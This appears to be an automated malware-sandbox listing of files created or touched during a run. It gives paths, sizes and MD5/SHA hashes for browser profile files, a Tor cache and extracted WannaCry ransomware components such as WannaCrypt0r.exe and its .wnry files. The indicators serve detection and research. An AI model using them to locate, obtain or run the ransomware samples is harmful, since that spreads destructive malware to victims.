3c25920cdffa55fd4285a4b42d1113374bd373e4828d5b69ba3f633fc9f8cebd33085c3e9a7833c19a505e43dd1776b986ff91192fd4a9643754f4c1fe7452e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e16a9d6d63743fca56f65465d9f859bb

SHA1
c92787bfa1c8dde1309475747ee84575e86dd3d2

SHA256
77842059a6e0287705194bb0bad2bcb43e3d9dfb0316471fe6a662cee33f3a9f

SHA512
c6fbe07bdadd90561bef4d4be159fda6e34f7389575f0a16e5dffc826b648129e9215f75aaf9c5ed45314a27c32b8638e9595853629ab35e3482ddc3a11dd70a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
a7caf73d643bc3a994e5022be51d2afa

SHA1
197df07bfca5a61b193e409604f4613e7dbe625c

SHA256
3300a20f48d05da7f6ec25b07b343273e7e5ad8fae2fc32dfd8d9492aa617d44

SHA512
c69ec0ec84744e9ff5e3678754248dd872d6b53c4a707b7ffeb8e8667488b57276a4fd0f7b49b3f90c1caf8d8201d3329bf23fa43397c3b45ca766ebc6c526f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
492d6cc5b9336f020471ebffc050e3e4

SHA1
bbef9051ccd0c52c4bc94f1d760e1df5997a7e2f

SHA256
6ebe5a833a036bf1b9669705e60044561c28f916dc0fe01103462ea450ed5e26

SHA512
9be6eb27c79b091953a45edaf7d4baf9d4c4b3d87a3797708538975f1ebc6f6733a91eb5457dedc14ac30634f6b812b26221d17448eadbbd25cff6107006927b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
8b831c3bc9dfa5cc91cba3c39d3b35ba

SHA1
17bd436f3f0a4c901cb853aaa08d139ecf90bea8

SHA256
2b20d7645bd63354d1620eabaa2eade4c0cc9a05004e6b893a51d884956049eb

SHA512
1cd29805d2faa3f90c5f8503907b884bb2dfb3fdd33558e4d65b9b0e6b9c76f501e8b6c4ed7bebc9fafc08a52b154d2a7e4aa322e9f444bc53d344e0c10aae5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
d2e57f7be833b3efe8632a41c6a9279e

SHA1
21fe8455bd1a365c4bd2bd2ef898ff03bc26f5b0

SHA256
aa68a47f0f5a50ed1e85610b79e0e8af67d4cefc0551e2cc8c240c620e72c5ff

SHA512
9b20ab59a03878c17cea590b4b1129a950aa659558f51713b0f2d599035ac813c27c8f06d167d06497d7f2178fa34f85aa77ad896bb21ea94d6ee1dd8ccd974a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
c9d5cc7ae813bccd0d6baa97931efdd6

SHA1
838496543c605cf9b7167bdb2718a220cdc5e10d

SHA256
865c0e8af9b1a8273076ac3cff1ab0fa893b37eda6a180bd00ebf3755718b5d1

SHA512
8f30db9bf56d6c1924d5ceb0aba9e3846e8cbfc46d2d34a47118218d6a6746da6549b188d2acf32f9a2b0acafecbcb04e389a3c7798d8ebc40e62554686de7b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
d24444620a10cc7892d00d2fd425e19a

SHA1
178ae327d59130b033a6014bbabce309670067f3

SHA256
89db84fec00b4668edb48852463f9bd16f0784e7227e210cf19c31a39d91cbac

SHA512
e8a7d67af25f250ceed2497b44ea8ff6d06dc5828c0a79c955e3385c2caf8e9d0ae9b8aafd1e8b7e8ab1a0a1de66ab28dfcbff9a3199c4107feacd0b57c2c6a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
68561e32e11f1f308fb970875a945c05

SHA1
5e8b6f0de60d57a7e6d56a295b601dbeb29bd903

SHA256
268e2447666461615172bba7c62420162fa1eaebcef14d10da30c4a2a87453ef

SHA512
1be58757d0f0a68d628bd3c0b07ad59e94a4912adb35e65d441fb3ea5a9be858ed595fe92ba1f9f49d19913645501bc9f10b5bbd896d2ae9eb0c2f2f6233e4ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
28b2429734f8a5a78946d18e466596fa

SHA1
70a21580ed1b864e35cff46d2e540bbd0311b7e8

SHA256
865f767a3cb5372690f5cf8c9857aabf99d769a288542600ba468669ffdcec11

SHA512
82425483a050afc057d325c94f351a87c07b1a3beb8e3702d312810641c5d98e15bb87c78eb894487d33e7dcb2f201ee7de1cc98256cd43a2bb4f65dbc5554c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
5721453aab52ee737e8e9546365563e0

SHA1
d6348df3f26246b2cbc630bceb1549fcc7099b09

SHA256
28120b7fbaa1101363806ee9d9e33399940f3a23787309cf20328b325344c1f4

SHA512
768b8c4876c6d013e5d6e4676ba134a16abdb51961993cd1cd753ef7ccac7294f20bf4cde637176120dd20c6a839e8ac3392782d9ba2c4a4d80276feaa58f1a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
d40d6b74dab9a6f59c2ef6d257166e31

SHA1
991ce5f79b296d9de675b4959d4573ea49467b71

SHA256
9736d948e6eb9c5d1e0e88f1f9f997f788eed5888754ac9a926ac1ff0f149eea

SHA512
cd969030eba8d39bbddb53687b834535dfe737f090d79ca479f811b46013ee839e3e0b68821348fbafddbd0239e5fa11232d058b57cdda259b481c5ab20a95b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
2ed6333a255a7bddb6e0750b4c10fdfe

SHA1
fcb29c651f71be9bf4d7c855e1e7f31057a9365d

SHA256
713ac092c7af1914093bf7bd8c54f9e86ca17c5f4182d56e8ef0b9a95787b745

SHA512
ef6ade19a4cd6934c86b5bb4c05e2fb6077c2725302e541df3e95364f0a0b9ca516ed814cc3cba3432fa5ee54ff76da3cac0992448b2bb9eff0b5093fe547458

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
bee10acb897edea484f8c4a734a76339

SHA1
de31065fc72013cdcd9a3eef56558d3d757a8036

SHA256
daf9cd42f3a6ce2e86c01bb8b5fd8fa8154f96d66c66f4ec20118a959f44b500

SHA512
0a6a3af37cb6a5fdffcd8a25f5f962f0288880f560e41d2b8135afd890ea88a0174227c528be518b13402ea872bc6fa2e32003779d8c0a3a7690bb423d8898d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1631a6950f2896980d40eddcbc827843

SHA1
f86534458a8d6189f2c803dffe8f9cdbd103ebda

SHA256
a2e833dee5a302b816bd490e46c9259b88394647405cc1b05ac93aee3778e9e2

SHA512
03339b26db4b10c3564b1260a72d7aeec9931843c2c4eb1361f223ff1f7641a15c496218bcba274b652ebace1c350b57b7c0f12740c7aa71184ddf65d7c85170

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
1042ed30e24b4491356febaf30342afe

SHA1
f59fcfeacbda1df5a6bc4eaf58080a7376634473

SHA256
44bf407edcf2313e6fe8b305871648c6a7cb2310919e37229dc358607be040f4

SHA512
54d7ebc7f49569491998930d85bb2635738fd1c7dfb7b1eb79d3870a9a9af00730c2d2e725a23e0753cc4a33aba3df7171394a043bb305ccda34e7ea0c37367c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
7ff4eb23fa3ff8d0eeb2b34b4e686d62

SHA1
8a62c86ffb25a3e788b96ffaf7853a06f8fb9955

SHA256
4997f46c27748e186fb5ebb974c2967e1faca156cc067723ecbdb972b4d726f9

SHA512
93575b40a2f5fc5b5dc186238492d3d14d7c4d00245b6793569b140edef59839bd78a1438c702756a2aac6754f138c58b5693662b3ebd3f9b08c4724380bc74e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
74edc97ea4cda98728304c21cbc92bb5

SHA1
f9d83a45438740ca748291f62503551f8b489ca1

SHA256
e332e13aa10606240adbdd0c4da9c75da80b5f4b90b1b2405bea738d559dd74c

SHA512
9ab6c704d6f672966f40919673a24ecf44e5c7124fe16cd2951c51d0c53390d7c843899ed902ddac07591d1a2c61a5303b0242be359c9f133fd5a9665f73d5a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
89931643f7bb426ac6efbcd2b66ebf7a

SHA1
654f383784c0b7b7e1f114f63a8975d2749d31d1

SHA256
f7bbbba78c089fca2a16c32123226477e281e9484b1b3be6593a341bf0464f5d

SHA512
904c5947fd5765d78e0dfa6414506b883a8ef3576afa81a85ec4efb9dbf8c8a6e15e2b334d0896103912d03e060dee4f7ffb984154f265a8cb09b4a74875e011

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
f0dbaf640f52c7b3a51cff1e66230992

SHA1
81270b55c2868a43722cdaa3d4a7daa9e332ebdc

SHA256
2aa95ff1710e455451e35f4ea54777a0310afd51ab706efe7b2eb512526d8076

SHA512
1d3ea6460d993337d0c6cc038d5b7eb93db1117fa855960fbeb19e74d402520f16ebbc0c1268c8a851133c703a31a78e6d66770e786b1862351c8dc224b0cc6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
861c4d80a7769e2d8721a99e66146644

SHA1
f1dd6516ec3a8e90f59b46721bb0148a6d8028b8

SHA256
7d33bb7ab14e7def4fbff5703bb70d80a1d71dc9af853dfec5d31d88bceac9f5

SHA512
2cc44b17a4a9e7130bad80212630b5e4b32c28f06e08f42f878c2130f44b101c108f74cc19855aeed6fe5d4c9dd2d295e3f141553ed929726c26320a1e9f62d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
741fc408902c572cf667d19808192717

SHA1
d8f7dcf65c4884bc24d1dbf57f0b2c05434d2ede

SHA256
e4e0737b40be61ac7763e960c4478977d540b8597de1c53e68d253c553f0af76

SHA512
4e32fbd0186dd0d35ad63e39c191b2a05f54b11c1232a2d09acfd8166f4122c5352cf0e48f69c6edcd3b79ce749454f03f91e7d0c4f36a52f5272c257fa2b56f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
87e5beee942203a8d4de33aa3707a5f0

SHA1
b661dd62ab02aa5c777d718b2ad818c4654c6854

SHA256
673090817890e2b932a14b76ef05481387f602ca6115b9fda67377b7cb105e26

SHA512
fd0ebd3bde4586a19f3d591e76ef91cfa9293e2061ae8871cf900c31acf8969f6a1245c226dc2286ee304571b7038a4a870271e2d7361767024be26f0772a869

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
0471c6bd64052c310f24d088cd62021d

SHA1
256053e47fe0dc9a4e62bcb1f9ee2a4470c82d58

SHA256
8dacdba499350eae1725795675dec01bc2b4aeb4ff3c6d0d377a323b03fa4246

SHA512
7706c4878cff73420694cc6b13ff86b082a271a58e20396fa1b33aaf99369d2923c6a2f7d6f338c771afcbf89b0773c5bf5e40df629f0efbe19ff8c3896c18ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
337649c5b797259c51ec9466932c403b

SHA1
629cc7a26dd98cd460dccc3d5fc54934e98eca5b

SHA256
2f728d6df70ded4dad81e56e2d2f523e9677a569606dca65c549b6c89e7ee7aa

SHA512
fee42f47561e490dc26d9b495158e29d667b401499e1266ef7e7da0bf20693bab1fe3f6a0c060a9d99941471e0d4e25d5eed76cda0accce936cf410892a1bcb6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
1446f73aef0be352e89e44b9e879ac1e

SHA1
343ce287a7c460ec47216942053aaff7c52663d2

SHA256
cd1099c11cb1a2c4675cb7374dd5378e4ccfcc87124ac3cd92b0eb5119d3be1a

SHA512
9b1efe4fc0285969f0f2c71e41aad72c6e990e9387c52ee28ee539d727d3515e0b86d8a74b4e819ff8988a4f93b8783ff6b4e08b8985d806b813009ef84ebecf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
efc7f250b0fc727e7de64acd423e1c21

SHA1
0839611ceccbf05927dae80bf76ae2259dac0bd1

SHA256
e5fe014e4f1d5ce2597da93f43ecb9fa27e2792e224b35fa1cf4959d5d7ac416

SHA512
407011502d83894a4d4ad7414d381c580399b748216c1bd96f0c831bbc47850bda23475b38ece84e4d8e7d614ac76f0d66b7fc11c9745a01f8a4921d797829e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5be8d6.TMP

Filesize
1KB

MD5
e467b8af38685958a6ececbf7dd4eb7c

SHA1
34c684f62988b26ad042d359423f68c933323425

SHA256
93dc7521c8c13bddd391ce67b581af9bdf35bd41905f15dfc0f0cfd94fbea1a6

SHA512
80390685473dee8a2d177d17fafca4652343676311f5a059e1f510f6d6eedc88abeb2c5e0b0acc52f7ad1987b5ba70a8ed2ff4852325bab22b8fe7610e187ea1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\f7ecd55b-2000-4e58-b569-87791d8268ed.tmp

Filesize
4KB

MD5
18afccbfb8c1755c9528f0ff642b7655

SHA1
50cf9f24e53882b1d038763d042f2ea1cbb8f087

SHA256
212e1d377ab7b5259524809ebf1fbadfd06fc5b5f644c90a9827965e8d6e06d8

SHA512
17b7b6fd602b4e87c3cd990748545b1ad08a25b9f88601c1343503bf87887f8ad0a81cba1fc529fa4aa31830aec426f0db45c4f037757422da1a3bc26d10c6cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2dc2948874f73283f17747e01ff32a5d

SHA1
e2d2c9435613b1ee2019de85316432a6f6af0892

SHA256
9b8dddc525b5c651ffb7accfccf29856d6eaa8302f2efa092d786c217326165f

SHA512
2107dd6e1106c2ae2128a547145b9474733934151df1b2bfb6588d8660fd8c09990964d90dd5d9f1e94534b1c571431d58f247c871db14ba333d09e6dfa0c6f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6ed9e54f62defc98f60117066c2556d3

SHA1
6faf5432a5ebef168b91a02bedc7dbfa36838e78

SHA256
ceca6416d9efc12ade90d7b0b904335ab7a81f28497b3199d2c62a720caec15f

SHA512
7f0da2ee1bd269c283a978c1c621d2279f00fb59015d6bcdbc1084f9b668cd8f361b6edf647afd3076159bf16f5e37338d7323f18d05b45dbc81066ea66bf90d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7718eb57c82021ae97b0ae071b6232e5

SHA1
40cb30b875a15ad651612648f7c9303492cd8fde

SHA256
074b261e471a62acb6c9e440a37b186ab6a473efdc73e08b4e23448066b7f014

SHA512
b4ad62f1ce50e7650b64244dd368b9041aeec63f79846df5850f707d0b9e913f0a428d4a4e5766102d70a464af539c5371a4e5df10d87c5e75f930aa85c532cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f018d12e5dc31d7f0f74b15c403fc057

SHA1
cf1b6ee296a69c2d6468c5de9bdfbd1ab65014ca

SHA256
7291e049a0e8bcad984034a6063a529faf2f04dc8bc968e6126144ced1371f98

SHA512
e838a27e6bda40782f9f838fe15b73a6b3baaa363df78aec7dcfa148853383155754e1c1257987ed1499e33e46e1a05137f17d9b5763780480974982a038c0de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
51aff88ccf341e0fe48b8065ebfa9ac5

SHA1
b14c2e2e9b4ce7879fed5f0e3669ac1435a1658f

SHA256
41090b06ab7e4fdbba43096665d7d0c8042b3e37296d006d1faa5794d68fa5ba

SHA512
ba527cae75ed364d50b2cc90f02f2a60fa48fd11310f798c8c9d3f61e110a45276678234f13ada9a255a86d598e3e25706db9a0c7a80a76480cb1b652bc92780

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3d0889b506f932b84bb7d0945f902a05

SHA1
29eb06254004ffac01535149bfc6a52d9ed6d041

SHA256
4da85024f5cfa35c9619e5a603368b3ee87173263924722c982ee25fcf8cd3e7

SHA512
6bafa47660f16f4a68396df97f5244c513d9569d81eadd1f111f8006b7fc8bb4ff1e69b43582b0bfd0d2eeb3057ade77b27845f32a1f4c5081505ad68d4c72af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
faf2304e6e77406ff8e95c3c034d669c

SHA1
4393b0de558722369998a8091867449e958a7c37

SHA256
b3a524fa854abd67ecd95a68295032301b99e24a785ef5256e574025bc2d3589

SHA512
ce6b65114895103eea63d1c93c7f5a0a7bd73e8db84dda318ef3f70af54428bdc71ca19b1d918afb01398446ed9de4a66d97d5f8ea517af37a95b0f5effac63c

Download Submit
C:\Users\Admin\AppData\Local\Temp\5a530dfd-bc51-4992-a05d-f09d41a331d4\AgileDotNetRT64.dll

Filesize
75KB

MD5
42b2c266e49a3acd346b91e3b0e638c0

SHA1
2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

SHA256
adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

SHA512
770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
21.3MB

MD5
c98bd129db79a4ab5fd46c4bb4ee1652

SHA1
491af8a8800d7faaa4d6a0ff58ee1a33a352a615

SHA256
56cabe0e0ca3db2b45a88664a4b321ed3d55c539ee61bd62ceab0c21ada4791d

SHA512
7f7b0d896591958f7b1d169d1e8b4415d1fe9287f499c8bd70438772e25574567d159b3ae40eb157b6833f2beec421e3eb380961dcb865e9b66b49cc0087fe0a

Download Submit
C:\Users\Admin\Downloads\NRVP.exe

Filesize
9KB

MD5
f7349874043c175bee2d0ff66438cbf0

SHA1
da371495289e25e92ad5d73dff6f29beea422427

SHA256
f852b9baeeefde61a20e5de4751b978594a9bf3b34514bc652d01224ee76da1b

SHA512
878f4bc1ab1b84b993725bcf2e98b1b9dcb72f75a20e34287d13016cc72f1df0334ac630aa8604a3d25b9569be2541c8f18f4f644f5f31ff31dd2d3fedd6d1ad

Download Submit
C:\Users\Admin\Downloads\NRVP.exe:Zone.Identifier

Filesize
615B

MD5
7f34592061365a84511bef10d286ba81

SHA1
7a1f56bd6d63b9b93be4778a154c78cfa503c04e

SHA256
3ad9b804757b8e45a435ee48748365330c1eea91b448b67b6c0bd694ad7882ca

SHA512
a354c85fffc424de977a1c595902fd732be5f6e948904e7a8791041a1b116f72abaa991b1b8b3cbe10b5f73ba12ee2b77777a90e14db3431e5a0d0396f088ff8

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 630014.crdownload

Filesize
10.9MB

MD5
7c7fb86210ab287c5b1b8da0e493818e

SHA1
fd0c9501f63ab40ad21b18f744c0ab126407b305

SHA256
adad0eaee2468fbff99e0089b10b1afec28044a67c100bc70c90f24782a778fe

SHA512
d5e19368b06b73700e1f5b1bbd962ee5ef0293c8eea6f70ef2fe38681c2101f22b5ef6ad42208a0a1439e0435dd830cd94f673cb1756f0a078a181d94e7ec90b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 699669.crdownload

Filesize
234KB

MD5
fedb45ddbd72fc70a81c789763038d81

SHA1
f1ed20c626d0a7ca2808ed768e7d7b319bc4c84a

SHA256
eacd5ed86a8ddd368a1089c7b97b791258e3eeb89c76c6da829b58d469f654b2

SHA512
813c0367f3aeceea9be02ffad4bfa8092ea44b428e68db8f3f33e45e4e5e53599d985fa79a708679b6957cbd04d9b9d67b288137fa71ac5a59e917b8792c8298

Download Submit
C:\Users\Admin\Downloads\WannaCry.7z

Filesize
3.3MB

MD5
3d578d30f8947a0e4ca0b6e340c6f9d7

SHA1
d581d6caec9ebe4aef2e0d365c8163116d18383d

SHA256
6d8e3047582dfcece9e3284538ff46a16e1809de18b1a7543e2082ad0a009237

SHA512
ccca55db5214f271d94a6d24596f74ae08e0d5ab053b9fedce6670d817ca0cf9065a5db76216362045e0133e6644139e73c72129c165c337898594c5d385da37

Download Submit
C:\Users\Admin\Downloads\WannaCry.7z:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\WannaCry\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Downloads\WannaCry\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\WannaCry\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\WannaCry\WannaCrypt0r.exe

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\WannaCry\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\WannaCry\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\WannaCry\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
